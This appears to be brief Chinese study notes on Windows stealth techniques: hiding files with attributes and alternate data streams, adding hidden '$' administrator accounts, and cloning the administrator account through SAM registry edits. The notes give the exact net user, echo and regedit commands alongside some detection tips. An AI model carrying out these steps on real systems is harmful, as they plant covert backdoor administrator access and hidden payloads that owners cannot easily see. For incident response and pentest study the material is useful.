隐藏文件

①文件属性隐藏

如何排查： 使用dir命令无法看到有特殊属性的文件需使用/a

②真隐藏

相当于给原本的文件增加系统文件属性、存档文件属性、只读文集属性、隐藏文件属性

如何排查： 取消受保护的操作系统文件

③利用ADS隐藏

使用数据流

echo "123">>tet.php:hidden.jpg::$DATA

此时该文件无法通过补全等常规手段查看

如何排查&清理： dir /r可查 或直接删除对应的显示文件，直接删除test.php即可

隐藏账号&克隆账号

net user test$ qaz123 /add

net localgroup administrators test$ /add

添加隐藏账户，并加入管理员组

检查方法：通过D盾查杀工具

如和创建影子账户,创建出的test用户可以已administrator账户的身份登陆

①创建一个账户名为test$

net user test$ mima /add

给sam表分配权限

注册表:REGEDIT 位置：HKEY_LOCAL_MACHINE\SAM\SAM

导出三个表

①administrator用户的值对应的表3.reg

②test$用户的用户表，1.reg

③test$用户值对应的表，2.reg

替换2.reg中的f值为3.reg

导入注册表，并删除test$账户 先删，后导

net user test$ /del

regedit /s 1.reg

regedit /s 2.reg

导入效果